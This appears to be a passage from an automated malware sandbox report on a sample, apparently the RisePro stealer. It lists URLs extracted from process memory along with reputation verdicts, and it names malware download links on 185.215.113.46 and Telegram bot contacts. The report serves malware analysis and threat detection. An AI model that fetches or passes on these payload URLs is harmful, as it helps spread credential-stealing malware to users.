                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://www.amazon.com/firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://t.me/RiseProSUPPORTRageMP131.exe, 00000008.00000002.2348896426.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://185.215.113.46/cost/fu.exeagertaTMPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://www.ecosia.org/newtab/I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.youtube.com/firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3162934326.000001545508B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3226617905.0000015461F4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2946754613.0000290E28A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3279722819.000001545C4B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3101971080.000001546273D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3108638355.0000015461F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3272678888.000001545508B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3256356812.0000015455286000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://bugzilla.mozilla.org/show_bug.cgi?id=1283601firefox.exe, 00000024.00000003.3222585052.000001546347D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://MD8.mozilla.org/1/mfirefox.exe, 00000024.00000003.2682620775.00000154620EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=firefox.exe, 00000024.00000003.2556167176.000001545FDE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2730426626.0000015450EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://127.0.0.1:firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://bugzilla.mozilla.org/show_bug.cgi?id=1266220firefox.exe, 00000024.00000003.3241920189.00000154634B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3102477176.0000015461F47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3108485132.00000154627FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152firefox.exe, 00000024.00000003.2829883257.00000154624C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2963701016.00000154624C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3308363713.00000154624C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://ipinfo.io/RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://shavar.services.mozilla.com/firefox.exe, 00000024.00000003.2680049158.0000015462239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://185.215.113.46/cost/ladas.exenBuilRageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • 13%, Virustotal, Browse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://accounts.google.comC:firefox.exe, 00000021.00000002.2399450082.000001C4DB630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://ipinfo.io:443/widget/demo/191.96.227.222I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.000000000140A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.000000000140A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://spocs.getpocket.com/firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2700569964.000001545E4CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://185.215.113.46/cost/well.exeMPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • 22%, Virustotal, Browse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    http://185.215.113.46/cost/ladas.exeFMPGPH131.exe, 00000006.00000002.3345445002.0000000001446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • 12%, Virustotal, Browse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://t.me/risepro_botGI2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://t.xMPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://185.215.113.46/mine/amert.exegI2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • 12%, Virustotal, Browse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      http://a9.com/-/spec/opensearch/1.0/firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://185.215.113.46/cost/ladas.exe6I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • 13%, Virustotal, Browse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://www.youtube.comC:firefox.exe, 0000001F.00000002.2388590768.00000159B5200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://185.215.113.46/cost/ladas.exeo4HMPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        http://185.215.113.46/mine/amert.exeSI2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • 13%, Virustotal, Browse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        http://185.215.113.46/cost/ladas.exe2MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • 12%, Virustotal, Browse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        http://185.215.113.46/cost/ladas.exe1MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • 12%, Virustotal, Browse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        http://185.215.113.46/cost/ladas.exe0MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • 13%, Virustotal, Browse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        http://mozilla.org/MPL/2.0/.firefox.exe, 00000024.00000003.3065217085.0000015453A7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2469545196.0000015453AB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2469545196.0000015453AA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2829883257.00000154624C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3043257931.0000015454ECE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3343901655.0000015453A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2681200219.000001545C450000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2462909736.0000015453D96000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3061707200.000001545E3D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3065069570.0000015453AA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3327988001.0000015453D9A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2972373655.0000015453DB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C18A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3238352322.000001546319A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2502897099.000001545E3D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2703972523.000001545DBC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2468329463.00000154535C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2568116959.000001545E3D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3224963305.0000015463497000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3333878095.000001545C44F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3070437706.0000015453AD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://mozilla.org/0cfirefox.exe, 00000024.00000003.2949175906.000012AB64003000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://185.215.113.46/mine/amert.exe?I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            http://185.215.113.46/cost/ladas.exegI2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • 12%, Virustotal, Browse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839firefox.exe, 00000024.00000003.3119695544.0000015463114000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://x1.c.lencr.org/0firefox.exe, 00000024.00000003.2553660970.00000154622DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2677483972.00000154622DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://x1.i.lencr.org/0firefox.exe, 00000024.00000003.2553660970.00000154622DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2677483972.00000154622DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://t.me/risepro_bot$RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://185.215.113.46/cost/ladas.exebMPGPH131.exe, 00000006.00000002.3345445002.0000000001446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • 16%, Virustotal, Browse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                http://a9.com/-/spec/opensearch/1.1/firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://infra.spec.whatwg.org/#ascii-whitespacefirefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://json-schema.org/draft/2019-09/schemafirefox.exe, 00000024.00000003.2683298473.0000015462047000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://t.me/risepro_bot;RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://ipinfo.io/widget/demo/191.96.227.222I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.000000000140A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.000000000140A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001430000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://185.215.113.46/cost/ladas.exeppDataMPGPH131.exe, 00000006.00000002.3345445002.0000000001485000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.3266538532.0000000001485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • 15%, Virustotal, Browse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://duckduckgo.com/?t=ffab&q=firefox.exe, 00000024.00000003.2680917978.0000015462217000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://185.215.113.46/mine/plaza.exeMPGPH131.exe, 00000006.00000002.3401083597.00000000062BE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • 23%, Virustotal, Browse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            http://185.215.113.46/mine/amert.exe4I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • 12%, Virustotal, Browse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://bugzilla.mozilla.org/show_bug.cgi?id=793869firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://mathiasbynens.be/firefox.exe, 00000024.00000003.3278732309.000001545501F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://bugzilla.mozilla.org/show_bug.cgi?id=1678448firefox.exe, 00000024.00000003.3105381143.00000154627D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3241920189.00000154634B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3222585052.000001546347D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoI2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://contile.services.mozilla.com/v1/tilesfirefox.exe, 00000024.00000003.2703972523.000001545DBC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://185.215.113.46/cost/well.exe2I2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • 14%, Virustotal, Browse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      http://185.215.113.46/mine/amert.exe$I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • 12%, Virustotal, Browse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://screenshots.firefox.com/firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://185.215.113.46/mine/plaza.exeMMPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • 12%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        		unknown
                                                                                                                        https://www.google.com/searchfirefox.exe, 00000024.00000003.2682498384.00000154620FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2466570051.00000154500BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://json-schema.org/draft-07/schema#-firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://185.215.113.46/cost/niks.exeFI2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • 16%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            		unknown
                                                                                                                            http://185.215.113.46/cost/fu.exe22RageMP131.exe, 00000008.00000002.2348896426.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            		unknown
                                                                                                                            http://185.215.113.46/cost/ladas.exexMPGPH131.exe, 00000006.00000002.3345445002.0000000001446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • 14%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            		unknown
                                                                                                                            https://twitter.com/firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://bugzilla.mozilla.org/show_bug.cgi?id=1193802firefox.exe, 00000024.00000003.3105381143.00000154627D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://185.215.113.46/cost/ladas.exerMPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                		unknown
                                                                                                                                http://mozilla.org/Zfirefox.exe, 00000024.00000003.2949175906.000012AB64003000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://185.215.113.46/cost/niks.exeJMPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  		unknown
                                                                                                                                  http://185.215.113.46/cost/niks.exexMPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • 15%, Virustotal, Browse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  		unknown
                                                                                                                                  https://t.me/risepro_botRageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.google.com/complete/searchfirefox.exe, 00000024.00000003.2512556062.0000015461F32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2508540911.000001545C141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://github.com/google/closure-compiler/issues/3177firefox.exe, 00000024.00000003.2539757750.000001545C195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3296549878.000001545C18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C191000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2512039904.000001545C195000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://t.me/risepro_boteRageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://185.215.113.46/mine/plaza.exe0MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • 16%, Virustotal, Browse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          		unknown

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          142.251.35.182
                                                                                                                                          		unknownUnited States
                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                          13.107.6.158
                                                                                                                                          		unknownUnited States
                                                                                                                                          		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                          142.250.72.118
                                                                                                                                          		unknownUnited States
                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                          204.79.197.200
                                                                                                                                          		unknownUnited States
                                                                                                                                          		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                          13.107.246.40
                                                                                                                                          		unknownUnited States
                                                                                                                                          		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                          142.250.80.110
                                                                                                                                          		unknownUnited States
                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                          142.250.65.163
                                                                                                                                          		unknownUnited States
                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                          185.215.113.46
                                                                                                                                          		unknownPortugal
